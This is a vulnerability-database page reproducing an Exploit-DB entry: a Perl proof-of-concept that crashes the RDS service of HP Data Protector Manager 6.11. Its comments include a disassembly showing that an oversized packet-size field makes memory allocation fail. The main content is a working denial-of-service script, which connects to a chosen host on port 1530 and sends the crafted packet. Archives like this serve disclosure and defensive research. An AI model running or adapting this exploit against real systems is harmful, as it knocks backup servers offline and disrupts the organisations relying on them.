Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HP Data Protector Manager 6.11 - RDS Service Remote Denial of Service

🗓️ 08 Jan 2011 00:00:00Reported by PepeluxType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 24 Views

HP Data Protector Manager RDS Service Remote Denial of Servic

Code
#!/usr/bin/perl

# ===============================
# HP Data Protector Manager v6.11
# ===============================
#
# Bug: Remote Denial of Service Vulnerabilities (RDS Service)
#
# Software: http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html
# Date: 08/01/2011
# Authors: Roi Mallo - rmallof[AT]gmail[DOT]com
#                   http://elotrolad0.blogspot.com/ - http://twitter.com/rmallof
#              Pepelux - pepelux[AT]enye-sec[DOT]com
#                   http://www.enye-sec.org - http://www.pepelux.org - http://twitter.com/pepeluxx
#
# Vulnerable file: Program Files\OmniBack\rds.exe
#
# Tested on Windows XP SP2 && Windows XP SP3
#
#
# POC: 
# _ncp32.dll is the responsable of waiting the packet (RECV)
# when a packet is received, it uses _rm32.dll to allocating memory,
# as the size is too big, malloc can't allocate this size and the program exit.
#
# _ncp32.dll
# 00482F92   68 7DFAF908  	PUSH 8F9FA7D
# 00482F97   6A 00            	PUSH 0
# 00482F99   6A 01            	PUSH 1
# 00482F9B   6A 00            	PUSH 0
# 00482F9D   8B55 F8          	MOV EDX,DWORD PTR SS:[EBP-8] ; packet size (64000000h)
# 00482FA0   52               		PUSH EDX
# 00482FA1   E8 9C2D0000	CALL <JMP.&_rm32.#20_rm_getMem>
#
#
# _rm32.dll
# 0038C49B   8B45 08          	MOV EAX,DWORD PTR SS:[EBP+8] : packet size (64000000h)
# 0038C49E   83C0 08          	ADD EAX,8
# 0038C4A1   50               	PUSH EAX
# 0038C4A2   FF15 F4733A00 CALL DWORD PTR DS:[<&MSVCR71.malloc>]    ; MSVCR71.malloc  --> Returns 0 because no space available
# ......
# 0038C5F9   50               		PUSH EAX
# 0038C5FA   68 2C0C3A00  	PUSH _rm32.003A0C2C ; ASCII "rm_getMem: out of memory, allocating %u bytes. Called from %s"
#......
# 0038C64E   E8 8D220000      CALL _rm32.rm_errorExit



use IO::Socket;

my ($server, $port) = @ARGV ;

unless($ARGV[0] || $ARGV[1]) {
	print "Usage: perl $0 <host> [port]\n";
	print "\tdefault port = 1530\n\n";
	exit 1;
}

$port = 1530 if !($ARGV[1]);


if ($^O =~ /Win/) {system("cls");}else{system("clear");}

my $buf = "\x23\x8c\x29\xb6"; 	# header (always the same)
$buf .= "\x64\x00\x00\x00"; 		# data packet size (too big)
$buf .= "\x41"x4;						# data

print "[+] Connecting to $server:$port ...\n";

my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available.\n");

print "[+] Sending malicious packet ...\n";
print $sock1 "$buf";
print "\n[x] Server crashed!\n"; 
exit;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Jan 2011 00:00Current
7.4High risk
Vulners AI Score7.4
vulnerabilityremote denial of servicehp data protectorrds servicesoftwaresecurity bugpocwindows xpperlio::socket
24